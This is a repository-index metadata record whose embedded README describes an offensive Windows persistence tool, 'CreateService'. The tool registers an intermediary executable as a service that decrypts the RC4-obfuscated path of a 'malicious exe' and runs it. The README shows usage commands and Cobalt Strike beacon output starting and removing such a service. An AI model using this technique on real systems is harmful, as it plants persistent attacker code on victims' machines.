{"id":13841447,"url":"https://github.com/uknowsec/CreateService","last_synced_at":"2025-07-11T12:32:08.954Z","repository":{"id":108747170,"uuid":"297858148","full_name":"uknowsec/CreateService","owner":"uknowsec","description":"Persistence via service creation","archived":false,"fork":false,"pushed_at":"2021-04-26T06:43:12.000Z","size":446,"stargazers_count":104,"open_issues_count":0,"forks_count":27,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-11-13T08:11:30.717Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/uknowsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2020-09-23T05:03:52.000Z","updated_at":"2024-09-27T08:22:56.000Z","dependencies_parsed_at":"2023-04-03T13:34:26.899Z","dependency_job_id":null,"html_url":"https://github.com/uknowsec/CreateService","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/uknowsec%2FCreateService","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/uknowsec%2FCreateService/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/uknowsec%2FCreateService/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/uknowsec%2FCreateService/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/uknowsec","download_url":"https://codeload.github.com/uknowsec/CreateService/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com
","kind":"github","repositories_count":225720403,"owners_count":17513597,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:11.252Z","updated_at":"2024-11-21T11:30:55.349Z","avatar_url":"https://github.com/uknowsec.png","language":"C++","funding_links":[],"categories":["C++"],"sub_categories":[],"readme":"# CreateService\n\n## File descriptions\n\n- CreateService: main program for creating and deleting the service\n- CreateServiceDll: RDI version for creating and deleting the service\n- TransitEXE: intermediary program\n\n```\nC:\\Users\\Administrator\\Desktop\u003eCreateService.exe \"C:\\Users\\Administrator\\Desktop\\TransitEXE.exe\" \"C:\\Users\\Administrator\\Desktop\\test.exe\" test start\n[*] CreateService by Uknow\n    [+] ServiceName: test\n    [+] TransitPathName: C:\\Users\\Administrator\\Desktop\\TransitEXE.exe\n    [+] EvilPathName: C:\\Users\\Administrator\\Desktop\\test.exe\n    [+] Success! 
Service successfully Create and Start.\n```\n\nThe program registers TransitEXE.exe as a service, RC4-encrypts the path `C:\\Users\\Administrator\\Desktop\\test.exe` (the key is the current machine's PROCESSOR_REVISION environment variable), and writes it into the resources of `C:\\Users\\Administrator\\Desktop\\TransitEXE.exe`.\n\nOnce the service has been created, TransitEXE.exe decrypts the malicious exe's path from its own resources and runs it.\n\nThis way only the malicious exe needs to be supplied, with no need to compile service-module code on the spot.\n\n\n\n## Cobalt Strike RDI\n```\nbeacon\u003e CreateService C:\\Users\\Administrator\\Desktop\\TransitEXE.exe C:\\Users\\Administrator\\Desktop\\beacon.exe test start\n[*] Tasked beacon to spawn CreateService ....\n[+] arguments are:C:\\Users\\Administrator\\Desktop\\TransitEXE.exe C:\\Users\\Administrator\\Desktop\\beacon.exe test start\n[+] host called home, sent: 103053 bytes\n[+] received output:\n[*] CreateService by Uknow\n    [+] ServiceName: test\n    [+] TransitPathName: C:\\Users\\Administrator\\Desktop\\TransitEXE.exe\n    [+] EvilPathName: C:\\Users\\Administrator\\Desktop\\beacon.exe\n    [+] Success! Service successfully Create and Start.\n\nbeacon\u003e CreateService C:\\Users\\Administrator\\Desktop\\TransitEXE.exe C:\\Users\\Administrator\\Desktop\\beacon.exe test stop\n[*] Tasked beacon to spawn CreateService ....\n[+] arguments are:C:\\Users\\Administrator\\Desktop\\TransitEXE.exe C:\\Users\\Administrator\\Desktop\\beacon.exe test stop\n[+] host called home, sent: 103052 bytes\n[+] received output:\n[*] CreateService by Uknow\n    [+] ServiceName: test\n    [+] TransitPathName: C:\\Users\\Administrator\\Desktop\\TransitEXE.exe\n    [+] EvilPathName: C:\\Users\\Administrator\\Desktop\\beacon.exe\n    [+] Success! Service successfully Stop and Delete.\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fuknowsec%2FCreateService","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fuknowsec%2FCreateService","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fuknowsec%2FCreateService/lists"}